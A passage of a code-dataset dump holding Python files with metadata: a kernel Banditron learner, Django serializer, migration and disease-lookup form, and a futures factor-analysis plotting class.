test_interval=test_interval)\n self.g = g\n self.dim = B\n self.w = np.zeros((self.K, B))\n self.B = B\n self.bags = np.zeros((B, x[0].shape[0]))\n self.kernel = kernel.gauss\n self.normalize = normalize\n\n def train(self, t):\n \"\"\"\n :param t: the number of training.\n \"\"\"\n seq = np.arange(self.data_size)\n np.random.shuffle(seq)\n\n ol_ratio_list = []\n ol, cl = 0, 0 # the number of ordinary, complementary labels\n\n accuracy_ratio_list = []\n correct, false = 0, 0\n\n for count, i in enumerate(seq):\n x, y = self.x[i], self.y[i]\n if count == 0:\n self.bags = x.reshape(1, -1)\n self.w = np.zeros((self.K, 1))\n elif count < self.B:\n self.bags = np.vstack((self.bags, x.reshape(1, -1)))\n self.w = np.hstack((self.w, np.zeros((self.K, 1))))\n\n try:\n _ = self._fun(x)\n except RuntimeWarning:\n false += 1\n if count % self.interval == 0:\n print(count)\n print(\"ordinary labels ratio\", ol / (ol + cl))\n print(\"accuracy ratio\", correct / (correct + false))\n print('')\n ol_ratio_list.append(ol / (ol + cl))\n accuracy_ratio_list.append(correct / (correct + false))\n continue\n\n wx = self._det_fun(self._fun(x))\n predict = self._det_label(wx)\n\n gamma = self.gamma\n proposed_label, p = self._det_proposed_label(predict, gamma)\n self._update(x, predict, proposed_label, p, (proposed_label == y))\n\n\n if predict == y:\n correct += 1\n else:\n false += 1\n\n if proposed_label == y:\n ol += 1\n else:\n cl += 1\n\n if count % self.interval == 0:\n print(count)\n print(\"ordinary labels ratio\", ol / (ol + cl))\n print(\"accuracy ratio\", correct / (correct + false))\n print('')\n ol_ratio_list.append(ol / (ol + cl))\n accuracy_ratio_list.append(correct / (correct + false))\n\n final_l = ol / (ol + cl)\n final_ac = correct / (correct + false)\n return ol_ratio_list, accuracy_ratio_list, final_l, final_ac\n\n def _fun(self, x):\n if self.kernel == kernel.gauss:\n x = (np.exp(-np.sum(np.square(self.bags - x), axis=1) / self.g))\n if self.normalize:\n return x / np.linalg.norm(x)\n else:\n return x\n else:\n raise condition_error", "sub_path": "banditron_kernel.py", "file_name": "banditron_kernel.py", "file_ext": "py", "file_size_in_byte": 3386, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 4, "usage_type": "attribute"}, {"api_name": "warnings.simplefilter", "line_number": 7, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 9, "usage_type": "name"}, {"api_name": "banditron.Banditron", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 106, "usage_type": "attribute"}]} +{"seq_id": "645673557", "text": "from rest_framework import serializers\nfrom themes.models import Review\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n\t\"\"\"review \n\t\"\"\"\n\tclass Meta:\n\t\tmodel = Review\n\t\tfields = (\n\t\t\t'theme',\n\t\t\t'user',\n\t\t\t'comment',\n\t\t\t'rating',\n\t\t)\n\n\tdef validate(self,data):\n\t\tcomment = data.values\n\n\t\tif not comment:\n\t\t\tmsg = 'Please enter a comment'\n\n\t\treturn data\n\n\n\n", "sub_path": "details/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 419, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "themes.models.Review", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "324370003", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('info', '0008_auto_20150923_2107'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='show_deadline',\n field=models.BooleanField(default=False),\n ),\n migrations.AlterField(\n model_name='message',\n name='pub_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 9, 23, 21, 8, 35, 403994)),\n ),\n ]\n", "sub_path": "info/migrations/0009_auto_20150923_2108.py", "file_name": "0009_auto_20150923_2108.py", "file_ext": "py", "file_size_in_byte": 628, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "27753906", "text": "from django import forms\nfrom django.conf import settings\nimport requests\n\nclass DiseaseForm(forms.Form):\n disease = forms.CharField(max_length=100)\n\n def search(self):\n result={}\n disease = self.cleaned_data['disease']\n endpoint=\"https://disease-info-api.herokuapp.com/diseases/{disease_id}.json\"\n url = endpoint.format(disease_id=disease)\n response = requests.get(url)\n if response.status_code == 200: # SUCCESS\n result = response.json()\n result['success'] = True\n else:\n result['success'] = False\n if response.status_code == 404: # NOT FOUND\n result['message'] = 'No entry found for \"%s\"' % disease\n else:\n result['message'] = 'The Disease API is not available at the moment. Please try again later.'\n return result\n", "sub_path": "disease/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 868, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.forms.Form", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "152570589", "text": "import os\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\nfrom pandas import (Series,\n DataFrame)\nimport matplotlib.pyplot as plt\nfrom typing import Callable, Tuple\nfrom collections import defaultdict\n\nfrom utils.utility import stack_dataframe_by_fields\n\nfrom bases.base import BaseClass\nfrom data_manager.ContinuousContractDataManager import ContinuousContractDataManager\n\nplt.rcParams['font.family'] = ['sans-serif']\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\ndef get_q_later_quantile(factor_data_with_pool: DataFrame, quantile: float) -> Tuple[DataFrame]:\n \"\"\"\"\"\"\n def apply_quantile1(series):\n series.fillna(0.0, inplace=True)\n quantile1 = series[series > 0].quantile(q=quantile, interpolation='midpoint')\n return quantile1\n\n def apply_quantile2(series):\n series.fillna(0.0, inplace=True)\n quantile2 = series[series < 0].quantile(q=1 - quantile, interpolation='midpoint')\n return quantile2\n\n quantile1 = factor_data_with_pool.apply(func=apply_quantile1, axis=1)\n quantile2 = factor_data_with_pool.apply(func=apply_quantile2, axis=1)\n return quantile1, quantile2\n\n\nclass FactorTest(BaseClass):\n\n def __init__(self, file_path: str) -> None:\n \"\"\"Constructor\"\"\"\n self.file_path: Path = Path(file_path)\n\n self.factor_name: str = None\n self.factor_data: DataFrame = None\n self.factor_data_with_pool: DataFrame = None\n\n self.commodity_pool: DataFrame = None\n\n self.long_short_quantile_func: Callable = None\n\n self.quantile1: Series = None\n self.quantile2: Series = None\n\n self.continuous_contract_data_manager: ContinuousContractDataManager = ContinuousContractDataManager()\n\n # 如果不存在因子绩效保存路径,则需要先创建\n self.init_file_path()\n\n def init_file_path(self) -> None:\n \"\"\"\n 初始化各类文件夹\n :return: None\n \"\"\"\n if not os.path.exists(self.file_path):\n os.makedirs(self.file_path)\n\n distribution_file_path = self.file_path.joinpath(\"factor_distribution\")\n if not os.path.exists(distribution_file_path):\n os.makedirs(distribution_file_path)\n\n time_series_file_path = self.file_path.joinpath('time_series')\n if not os.path.exists(time_series_file_path):\n os.makedirs(time_series_file_path)\n\n all_time_series_file_path = time_series_file_path.joinpath(\"all_time_series\")\n if not os.path.exists(all_time_series_file_path):\n os.makedirs(all_time_series_file_path)\n\n time_series_per_symbol_file_path = self.file_path.joinpath(\"time_series\").joinpath(\"time_series_per_symbol\")\n if not os.path.exists(time_series_per_symbol_file_path):\n os.makedirs(time_series_per_symbol_file_path)\n\n time_series_per_symbol_2016_file_path = self.file_path.joinpath('time_series').\\\n joinpath(\"time_series_per_symbol_2016\")\n if not os.path.exists(time_series_per_symbol_2016_file_path):\n os.makedirs(time_series_per_symbol_2016_file_path)\n\n autocorrelation_file_path = self.file_path.joinpath(\"autocorrelation\")\n if not os.path.exists(autocorrelation_file_path):\n os.makedirs(autocorrelation_file_path)\n autocorrelation_all_symbols_file_path = autocorrelation_file_path.joinpath(\"all_symbols\")\n if not os.path.exists(autocorrelation_all_symbols_file_path):\n os.makedirs(autocorrelation_all_symbols_file_path)\n\n average_autocorrelation_file_path = autocorrelation_file_path.joinpath(\"average_autocorrelation\")\n if not os.path.exists(average_autocorrelation_file_path):\n os.makedirs(average_autocorrelation_file_path)\n\n def set_factor(self, factor_name: str, factor_data: DataFrame) -> None:\n \"\"\"\n 设置因子值DataFrame\n :param factor_name: 因子名,主要用于保存因子情况相关稳健时使用\n :param factor_data: 因子值,index为交易日期,columns为合约代码\n :return: None\n \"\"\"\n self.factor_name = factor_name\n self.factor_data = factor_data\n\n def set_commodity_pool(self, commodity_pool: DataFrame) -> None:\n \"\"\"\n 设置商品池\n :param commodity_pool: 商品池,index为交易日期,columns为合约代码\n :return: None\n \"\"\"\n self.commodity_pool = commodity_pool\n\n def set_factor_quantile(self, func: Callable, **params) -> None:\n \"\"\"\n 设置多空分位数\n :param func: 设置多空分位数的函数\n :param params: long_short_quantile_func函数的参数\n :return: None\n \"\"\"\n if not isinstance(self.factor_data, DataFrame):\n raise ValueError(\"Please specify factor data first!\")\n else:\n factor_data = self.factor_data\n if hasattr(self, \"commodity_pool\"):\n commodity_pool = self.commodity_pool\n factor_data_with_pool = factor_data.copy()\n factor_data_with_pool[~commodity_pool] = np.nan\n else:\n factor_data_with_pool = factor_data.copy()\n self.factor_data_with_pool = factor_data_with_pool\n\n quantile1, quantile2 = func(factor_data_with_pool, **params)\n self.quantile1 = quantile1\n self.quantile2 = quantile2\n\n def get_continuous_field(self, contract: str = 'main', price: str = 'close', rebalance_num: int = 1, field: str = 'continuous_price') -> DataFrame:\n \"\"\"\n 获取连续合约指定字段的数据\n\n Parameters\n ----------\n contract: str\n 合约种类,目前可选有main和active_near, main表示主力合约, active_near表示活跃近月\n\n price: str\n 选择以什么价格为基础的连续数据, close为收盘价, settlement结算价\n\n rebalance_num: int, default = 1\n 换仓天数, 可选天数1,3,5\n field: str, default = 'continuous_price'\n 字典,continuous_price\n\n Returns\n -------\n df: DataFrame\n 连续合约field字段数据, 一般是开盘价或收盘价\n \"\"\"\n return self.continuous_contract_data_manager.get_field(contract=contract,\n price=price,\n rebalance_num=rebalance_num,\n field=field\n )\n\n def get_rankX_y_plot(self):\n \"\"\"rankX_y因子收益率图\"\"\"\n\n # 预先检查\n if not isinstance(self.factor_data_with_pool, DataFrame):\n raise ValueError(\"factor data with pool is not defined!\")\n\n factor_data_with_pool = self.factor_data_with_pool\n\n\n factor_data_with_pool_rank = factor_data_with_pool.rank(axis=1, ascending=True)\n factor_data_with_pool_rank = factor_data_with_pool_rank.stack(dropna=True).to_frame(\"factor\")\n\n # return_df = return_df.stack(dropna=True).to_frame(\"return\")\n\n # data = pd.concat([factor_data_with_pool, return_df], axis=1)\n # plt.scatter(x=data[\"factor\"], y=data['return'])\n\n\n\n def get_factor_distribution(self, **params) -> None:\n \"\"\"获取因子值分布直方图\"\"\"\n if not isinstance(self.factor_data, DataFrame):\n raise ValueError(\"Please specify factor data first!\")\n else:\n factor_data = self.factor_data\n\n if 'figsize' in params:\n plt.figure(params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n if 'bins' in params:\n plt.hist(x=factor_data.values.flatten(), bins=params['bins'])\n else:\n plt.hist(x=factor_data.values.flatten(), bins=500)\n if 'xlim' in params:\n plt.xlim(params['xlim'][0], params['xlim'][1])\n\n distribution_file_path = self.file_path.joinpath(\"factor_distribution\")\n if not os.path.exists(distribution_file_path):\n os.makedirs(distribution_file_path)\n plt.title(f\"{self.factor_name} distribution\")\n plt.grid()\n plt.savefig(distribution_file_path.joinpath(f\"{self.factor_name} distribution.png\"))\n plt.show()\n\n stack_factor_data = factor_data.stack()\n factor_description = stack_factor_data.describe()\n factor_description['skew'] = stack_factor_data.skew()\n factor_description['kurt'] = stack_factor_data.kurt()\n\n factor_description.to_csv(distribution_file_path.joinpath(f\"{self.factor_name} description.csv\"))\n\n def get_factor_time_series(self, **params) -> None:\n \"\"\"获取因子时序图\"\"\"\n if not isinstance(self.factor_data, DataFrame):\n raise ValueError(\"Please specify factor data first!\")\n else:\n factor_data = self.factor_data\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(15, 8))\n\n time_series_file_path = self.file_path.joinpath('time_series')\n if not os.path.exists(time_series_file_path):\n os.makedirs(time_series_file_path)\n\n all_time_series_file_path = time_series_file_path.joinpath(\"all_time_series\")\n if not os.path.exists(all_time_series_file_path):\n os.makedirs(all_time_series_file_path)\n factor_data.plot(legend=False)\n plt.title(f\"{self.factor_name}_all_time_series\")\n plt.grid()\n plt.savefig(all_time_series_file_path.joinpath(f\"{self.factor_name}_all_time_series.png\"))\n plt.show()\n\n def get_factor_time_series_per_symbol(self, **params):\n \"\"\"\n 获取每个品种的时间序列图,配上分位数曲线\n :param params: None\n :return: None\n \"\"\"\n if not isinstance(self.factor_data_with_pool, DataFrame):\n raise ValueError(\"Please specify factor data with pool first!\")\n else:\n factor_data_with_pool = self.factor_data_with_pool\n\n if not hasattr(self, \"quantile1\") or not hasattr(self, \"quantile2\"):\n raise ValueError(\"Please specify quantile1 and quantile2 first!\")\n else:\n quantile1 = self.quantile1\n quantile2 = self.quantile2\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(15, 8))\n time_series_per_symbol_file_path = self.file_path.joinpath(\"time_series\").joinpath(\"time_series_per_symbol\")\n if not os.path.exists(time_series_per_symbol_file_path):\n os.makedirs(time_series_per_symbol_file_path)\n for symbol in factor_data_with_pool.columns:\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n factor_data_with_pool[symbol].plot(label=f'{symbol}_{self.factor_name}')\n quantile1.plot(label='quantile1')\n quantile2.plot(label='quantile2')\n plt.legend()\n plt.title(f\"{self.factor_name}_{symbol}_time_series\")\n plt.grid()\n plt.savefig(time_series_per_symbol_file_path.joinpath(f\"{symbol}_{self.factor_name}_time_series.png\"))\n plt.show()\n\n def get_factor_time_series_per_symbol_2016(self, **params):\n \"\"\"\n 获取每个品种的时间序列图,配上分位数曲线\n :param params: None\n :return: None\n \"\"\"\n if not isinstance(self.factor_data_with_pool, DataFrame):\n raise ValueError(\"Please specify factor data with pool first!\")\n else:\n factor_data_with_pool = self.factor_data_with_pool\n\n if not hasattr(self, \"quantile1\") or not hasattr(self, \"quantile2\"):\n raise ValueError(\"Please specify quantile1 and quantile2 first!\")\n else:\n quantile1 = self.quantile1\n quantile2 = self.quantile2\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(15, 8))\n time_series_per_symbol_2016_file_path = self.file_path.joinpath(\"time_series\").joinpath(\"time_series_per_symbol_2016\")\n if not os.path.exists(time_series_per_symbol_2016_file_path):\n os.makedirs(time_series_per_symbol_2016_file_path)\n for symbol in factor_data_with_pool.columns:\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n factor_data_with_pool[symbol]['2016'].plot(label=f'2016年日度{symbol}_{self.factor_name}')\n quantile1['2016'].plot(label='quantile1')\n quantile2['2016'].plot(label='quantile2')\n plt.legend()\n plt.title(f\"2016年日度_{self.factor_name}_{symbol}_time_series\")\n plt.grid()\n plt.savefig(time_series_per_symbol_2016_file_path.joinpath(f\"2016年日度_{symbol}_{self.factor_name}_time_series.png\"))\n plt.show()\n\n def get_factor_autocorrelation(self, **params):\n if not isinstance(self.factor_data, DataFrame):\n raise ValueError(\"Please specify factor data first!\")\n else:\n factor_data = self.factor_data\n\n if 'lags' in params:\n lags = params['lag']\n else:\n lags = 100\n\n autocorrelation_file_path = self.file_path.joinpath(\"autocorrelation\")\n if not os.path.exists(autocorrelation_file_path):\n os.makedirs(autocorrelation_file_path)\n autocorrelation_all_symbols_file_path = autocorrelation_file_path.joinpath(\"all_symbols\")\n if not os.path.exists(autocorrelation_all_symbols_file_path):\n os.makedirs(autocorrelation_all_symbols_file_path)\n autocorr_dict = defaultdict(list)\n for symbol in factor_data.columns:\n factor_series = factor_data[symbol]\n for lag in range(1, lags+1, 1):\n autocorr_dict[symbol].append(factor_series.autocorr(lag=lag))\n autocorr_df = pd.DataFrame(autocorr_dict, index=range(1, lag+1, 1))\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n autocorr_df.plot(legend=False)\n plt.title(f\"{self.factor_name}_autocorrelation_all_symbols\")\n plt.grid()\n plt.savefig(autocorrelation_all_symbols_file_path.joinpath(\"all_symbols_autocorrelation.png\"))\n plt.show()\n\n average_autocorrelation_file_path = autocorrelation_file_path.joinpath(\"average_autocorrelation\")\n if not os.path.exists(average_autocorrelation_file_path):\n os.makedirs(average_autocorrelation_file_path)\n average_autocorr_series = autocorr_df.mean(axis=1)\n\n if 'figsize' in params:\n plt.figure(figsize=params['figsize'])\n else:\n plt.figure(figsize=(20, 8))\n\n average_autocorr_series.plot()\n plt.title(f\"{self.factor_name}_average_autocorrelation\")\n plt.grid()\n plt.savefig(average_autocorrelation_file_path.joinpath(\"average_autocorrelation.png\"))\n plt.show()\n\n def run_all(self):\n self.get_factor_distribution()\n self.get_factor_time_series_per_symbol()\n self.get_factor_time_series_per_symbol_2016()\n self.get_factor_time_series()\n self.get_factor_autocorrelation()\n \n\n\n\n\n\n", "sub_path": "factor/factor_test.py", "file_name": "factor_test.py", "file_ext": "py", "file_size_in_byte": 15582, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 22, "usage_type": "name"}, {"api_name": "bases.base.BaseClass", "line_number": 39, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 46, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 51, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 53, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 54, "usage_type": "name"}, {"api_name": "data_manager.ContinuousContractDataManager.ContinuousContractDataManager", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 101, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 111, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 119, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "argument"}, {"api_name": "numpy.nan", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 142, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 174, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 192, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path", "line_number": 209, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 244, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 244, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 245, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 245, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 254, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path", "line_number": 270, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 274, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 274, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 276, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 292, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path", "line_number": 308, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 314, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 314, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 319, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 320, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 322, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 322, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 325, "usage_type": "argument"}, {"api_name": "os.path.exists", 